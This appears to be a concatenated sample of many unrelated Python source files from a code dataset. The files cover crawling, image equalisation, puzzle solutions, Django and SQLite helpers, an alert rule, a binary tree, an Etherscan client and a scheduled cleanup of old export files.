parser.add_argument( "--home", default=os.path.expandvars("$OPTICKS_HOME"), help="source HOME under which to look for CMakeLists.txt" )
parser.add_argument( "--level", default="info", help="logging level" )
parser.add_argument( "--dest", default="/tmp/tests", help="destination directory tree to be removed, recreated and populated" )
args = parser.parse_args()
fmt = '[%(asctime)s] p%(process)s {%(pathname)s:%(lineno)d} %(levelname)s - %(message)s'
logging.basicConfig(level=getattr(logging,args.level.upper()), format=fmt)
ok = OpticksCMakeProj(args.home)
bdir = args.root[0]
dest = args.dest
bt = BuildTree(bdir, projs=ok.subdirs)
top = bt.filtercopy( dest )
log.info("Copying %s files from buildtree %s into a new destination tree %s " % (BuildTree.NAME, bdir, dest ))
log.info("write testfile to %s " % top )
ok.write_testfile( top )
|
# -*- coding: utf-8 -*-
import cloud
import collections
import datetime
from request import Request
REQUEST_QUEUE_PREFIX = 'picrawler_request_'
RESULT_QUEUE_PREFIX = 'picrawler_result_'
class InvalidRequest(Exception):
pass
class PiCloudConnection(object):
"""Class that represents a connection to PiCloud.
Usage:
>>> from picrawler import PiCloudConnection
>>> with PiCloudConnection() as conn:
... response = conn.send(['http://www.wikipedia.org'])
... print 'status code:', response[0].status_code
... print 'content:', response[0].content[:15]
status code: 200
content: <!DOCTYPE html>
:param int max_parallel_jobs: (optional) The number of parallel jobs to run.
:param str core_type: (optional) PiCloud core type.
"""
def __init__(self, max_parallel_jobs=10, core_type='s1'):
self._max_parallel_jobs = max_parallel_jobs
self._core_type = core_type
self._connected = False
def __enter__(self):
if not self._connected:
self.connect()
return self
def __exit__(self, type, value, traceback):
self.close()
@property
def is_connected(self):
return self._connected
@property
def request_queue(self):
return self._request_queue
@property
def result_queue(self):
return self._result_queue
def connect(self):
"""Establishes a connection to PiCloud."""
self._initialize_queues()
self._connected = True
def close(self):
"""Closes the connection."""
assert self._connected, 'The connection to PiCloud has not been established.'
self._destroy_queues()
cloud.close()
self._connected = False
def send(self, req):
"""Sends the requests to PiCloud.
:param req: Requests to be sended to PiCloud. Must be one of the following:
* A string that contains a URL
* A list or a tuple or an iteratable that consists of URL strings
* A :class:`Request <picrawler.request.Request>` instance
* An list or a tuple or an iteratable that consists of :class:`Request <picrawler.request.Request>` instance
:return: List of :class:`BaseResponse <picrawler.response.BaseResponse>` instances.
"""
assert self._connected, 'The connection to PiCloud has not been established.'
# covert req into a list of Request instances
if isinstance(req, basestring):
requests = [Request(req)]
elif isinstance(req, Request):
requests = [req]
elif isinstance(req, collections.Iterable):
requests = []
for request in req:
if isinstance(request, Request):
requests.append(request)
elif isinstance(request, basestring):
requests.append(Request(request))
else:
raise InvalidRequest('Invalid request item')
else:
raise InvalidRequest('req must be either an instance of the '
'Request class or an iteratable of Request instances')
# send requests to the PiCloud queue
self._request_queue.push(requests)
responses = self._loop()
req_resp_map = {}
for resp in responses:
req_resp_map[resp.request.id] = resp
return [req_resp_map.get(r.id) for r in requests]
def _initialize_queues(self):
queue_id = datetime.datetime.now().strftime("%Y%m%d%H%M%S")
self._request_queue = cloud.queue.get(REQUEST_QUEUE_PREFIX + queue_id)
self._result_queue = cloud.queue.get(RESULT_QUEUE_PREFIX + queue_id)
# attach the request handler to the queue
self._request_queue.attach(lambda req: req(),
output_queues=[self._result_queue],
max_parallel_jobs=self._max_parallel_jobs,
_type=self._core_type)
def _destroy_queues(self):
self._request_queue.delete()
self._result_queue.delete()
self._request_queue = None
self._result_queue = None
def _loop(self):
gathered_responses = []
c = 0
while True:
# get the results
responses = self._result_queue.pop(timeout=0)
if responses:
for response in responses:
response.run_callback()
gathered_responses += responses
# break the loop if completed
if c % 3 == 0 and self._requests_completed():
break
c += 1
return gathered_responses
def _requests_completed(self):
request_queue_info = self._request_queue.info()
if (request_queue_info['count'] == 0 and
request_queue_info['processing_jobs'] == 0 and
request_queue_info['queued_jobs'] == 0):
# exit the loop if the result queue is empty
if self._result_queue.count() == 0:
return True
return False
|
PACKAGE_NAME = "patchworkdocker"
VERSION = "0.0.0"
DESCRIPTION = "TODO"
EXECUTABLE_NAME = "patchworkdocker"
|
from collections import defaultdict
from color.lab import LabMatrix
def luminance_histogram_from_matrix(matrix):
histogram = defaultdict(int)
for x, y in matrix:
l = matrix.l[x][y]
histogram[l] += 1
return histogram
def equalize(image):
matrix = LabMatrix.from_image(image)
histogram = luminance_histogram_from_matrix(matrix)
adjustments = {}
for i, luminance in enumerate(sorted(histogram.keys())):
relative_count = histogram[luminance] / image.size
new_value = relative_count * 100
if i > 0:
previous_luminance = sorted(histogram.keys())[i - 1]
new_value += adjustments[previous_luminance]
new_value = min(new_value, 100.0)
adjustments[luminance] = new_value
for x, y in matrix:
matrix.l[x][y] = adjustments[matrix.l[x][y]]
matrix.apply_to(image)
|
import string
def spin_words(sentence):
words = sentence.split(' ');
for i,word in enumerate( words ):
if len( word ) >= 5:
words[i] = word[::-1]
return string.join(words, ' ');
|
#Project Euler
a = ""
b = ""
mul = 0
flag = 0
ans = 0
for i in range(999, 100, -1):
for j in range(999, 100, -1):
mul = i * j
a = str(mul)
b = "".join(reversed(a))
if a == b:
ans = max(ans, mul)
print(ans)
|
from django.contrib import admin
# Register your models here.
from .models import *
admin.site.register(Language)
admin.site.register(Tag)
admin.site.register(Snippet)
admin.site.register(Comment) |
from sqlite3 import *
class manageSqlite:
file = "connections.db"
conn = connect(file)
conn.row_factory=Row
cursor = conn.cursor()
def __init__(self):
self.cursor.execute(
'CREATE TABLE IF NOT EXISTS connections (name VARCHAR(20), host VARCHAR(20), port VARCHAR(10), user VARCHAR(50), pwd VARCHAR(50))')
def addConnect(self, name, host, port, user, pwd):
self.cursor.execute("INSERT INTO connections(name, host, port, user, pwd) VALUES (?,?,?,?,?)",
(name, host, port, user, pwd))
self.cursor.close()
self.conn.commit()
self.conn.close()
def showConnect(self):
self.cursor.execute("SELECT * FROM connections")
data = self.cursor.fetchall()
return data |
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
import dateutil.parser
from ruletypes import RuleType
from util import pretty_ts
from util import ts_to_dt
from util import dt_to_ts
class StatRule(RuleType):
'''support
stat function in (sum, )
stat_type in (greater, less, equal)
'''
required_options = set(['stat', 'threshold', 'stat_type'])
def __init__(self, *args):
super(StatRule, self).__init__(*args)
self.stat_function = {
'sum':self._sum,
}
self.op = {
'greater':self.greater,
'less':self.less,
'equal':self.equal,
}
self.ts_field = self.rules.get('timestamp_field', '@timestamp')
self.stat_field = self.rules['stat_field']
self.group_by_field = self.rules.get("group_by")
self.threshold = self.rules['threshold']
self.stat = self.rules['stat']
self.stat_type = self.rules['stat_type']
self.match_value = []
def _sum(self, data):
return sum([d[self.stat_field] for d in data])
def greater(self, p1, p2):
return p1 > p2
def less(self, p1, p2):
return p1 < p2
def equal(self, p1, p2):
return p1 == p2
def add_data(self, data):
self.check_for_match(data)
def group_by(self, data):
group = {}
for event in data:
if event.get(self.stat_field) is None or event.get(self.group_by_field) is None:
continue
field_value = event[self.group_by_field]
group.setdefault(field_value, [])
group[field_value].append(event)
return group
def check_for_match(self,data):
stat_func = self.stat_function.get(self.stat)
stat_value_dict = {}
if not self.group_by_field:
stat_value_dict['all'] = stat_func(data)
else:
group_data = self.group_by(data)
for field_value, _data in group_data.iteritems():
stat_value_dict[field_value] = stat_func(_data)
match_success = False
match_value = []
for field_value, stat_value in stat_value_dict.iteritems():
match_success = self.op.get(self.stat_type)(stat_value, self.threshold)
if match_success:
match_value.append(field_value)
if match_value:
self.match_value.append(match_value)
if match_success:
self.add_match(data[0])
def get_match_str(self, match):
ts = match[self.rules['timestamp_field']]
lt = self.rules.get('use_local_time')
try:
match_value = self.match_value[-1][:5]
except:
match_value = []
message = "Between %s and %s\n" % (pretty_ts(dt_to_ts(ts_to_dt(ts) - self.rules['timeframe']), lt), pretty_ts(ts, lt))
message += "%s(%s) %s %s\nmatch value:\n\t%s...\n\n" % (
self.rules['stat'],
self.rules['stat_field'],
self.rules['stat_type'],
self.rules['threshold'],
'\n\t'.join(match_value)
)
return message
def garbage_collect(self, timestamp):
if len(self.match_value) > 1:
self.match_value = self.match_value[:-1]
|
# -*- coding: utf-8 -*-
"""
Created on Mon Nov 4 17:05:40 2019
@author: giuseppec
"""
import pandas as pd
import os
directory='C:/Users/giuseppec/Desktop/PYTHONTopicModelling/topics'
df=[]
i=0
for f in os.listdir(directory):
with open(os.path.join(directory, f), mode='r') as file:
#print(file.name)
df.append(pd.read_csv(file.name, sep=',', encoding='latin-1', engine='python'))
#print(df[i])
i = i+1
|
import android
droid = android.Android()
myconst = droid.getConstants("android.content.Intent").result
action = myconst['ACTION_VIEW']
uri = "content://android.provider.Contacts.People.CONTENT_URI"
itype = "vnd.android.cursor.dir/calls"
intent = droid.makeIntent(action, uri, itype).result
droid.startActivityIntent(intent)
|
from pydantic import BaseModel
class Todo(BaseModel):
title:str
description:str |
# array
import array
class BinaryTree:
def __init__(self, arr):
self.array = array.array('l', arr)
def preorder(self):
s = ''
def recursive(idx):
nonlocal s
if idx >= len(self.array):
return
s += str(self.array[idx]) + ' '
recursive(2*idx + 1)
recursive(2*idx + 2)
recursive(0)
print(s)
def inorder(self):
s = ''
def recursive(idx):
nonlocal s
if idx >= len(self.array):
return
recursive(2*idx + 1)
s += str(self.array[idx]) + ' '
recursive(2*idx + 2)
recursive(0)
print(s)
def postorder(self):
s = ''
def recursive(idx):
nonlocal s
if idx >= len(self.array):
return
recursive(2*idx + 1)
recursive(2*idx + 2)
s += str(self.array[idx]) + ' '
recursive(0)
print(s)
def bfs(self, value):
for i in range(len(self.array)):
if self.array[i] == value:
return True
return False
def dfs(self, value):
isFound = False
def recursive(idx):
nonlocal isFound
if idx >= len(self.array):
return
if isFound is True:
return
if self.array[idx] == value:
isFound = True
recursive(2*idx + 1)
recursive(2*idx + 2)
recursive(0)
return isFound
if __name__=="__main__":
binaryTree = BinaryTree([1,2,3,4,5,6])
binaryTree.preorder()
binaryTree.inorder()
binaryTree.postorder()
print(binaryTree.bfs(3))
print(binaryTree.dfs(3)) |
# from .models import model1
# from django import forms
# class form1(forms.ModelForm):
# class Meta:
# model = model1
# exclude=() |
# A number that never forms a palindrome through the reverse and add process
# is called a Lychrel number.
# For every number below ten-thousand, it will either
# (i) become a palindrome in less than fifty iterations, or,
# (ii) no one, with all the computing power that exists, has managed so
# far to map it to a palindrome.
# Find the number of Lychrel numbers below ten thousand.
LIMIT = 10**4
MAX_ITERATION = 50
def countLychrelNum():
count = 0
for x in range(1, LIMIT):
if isLychrelNum(x):
count += 1
return count
# Return true if N is a Lychrel number.
# Pre-condition: N is a positive integer below ten thousand
def isLychrelNum(N):
for time in range(0, MAX_ITERATION):
N += reverseNum(N)
if isPalindrome(N):
return False
return True
# Return the number formed by reversing the digits of the input number N.
def reverseNum(N):
reverse = 0
while N != 0:
reverse = 10 * reverse + N % 10
N //= 10
return reverse
# Return true if the decimal representation of N is a palindrome
def isPalindrome(N):
reverse = reverseNum(N)
if reverse == N:
return True
return False
|
from .client import Client
class Tokens(Client):
def __init__(self, tokenname='TheDAO', api_key='YourApiKeyToken'):
Client.__init__(self, address='', api_key=api_key)
self.tokenname = '&tokenname=' + tokenname
def make_url(self, call_type=''):
if call_type == 'tokensupply':
self.url = self.URL_BASES['prefix'] \
+ self.module \
+ self.action \
+ self.tokenname \
+ self.key
elif call_type == 'tokenbalance':
self.url = self.URL_BASES['prefix'] \
+ self.module \
+ self.action \
+ self.tokenname \
+ self.address \
+ self.key
def get_total_supply(self):
self.action = self.URL_BASES['action'] + 'tokensupply'
self.module = self.URL_BASES['module'] + 'stats'
self.make_url(call_type='tokensupply')
req = self.connect()
return req['result']
def get_token_balance(self, address):
self.address = self.URL_BASES['address'] + address
self.module = self.URL_BASES['module'] + 'account'
self.action = self.URL_BASES['action'] + 'tokenbalance'
self.make_url(call_type='tokenbalance')
req = self.connect()
return req['result']
|
"""Module deletes old files"""
import atexit
import os
import time
from apscheduler.schedulers.background import BackgroundScheduler
PATH_TO_EXPORT_FILES = os.environ.get('PATH_TO_EXPORT_FILES')
def delete_files():
"""Deletes files that were created more than 15 minutes ago"""
files = os.listdir(PATH_TO_EXPORT_FILES)
now = time.time()
for file in files:
file = os.path.join(PATH_TO_EXPORT_FILES, file)
if os.stat(file).st_mtime < now - 15 * 60:
os.remove(file)
SCHEDULER = BackgroundScheduler(daemon=True)
SCHEDULER.add_job(func=delete_files, trigger="interval", minutes=1)
SCHEDULER.start()
def stop_deleting():
"""stops deleting"""
SCHEDULER.shutdown()
atexit.register(stop_deleting)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.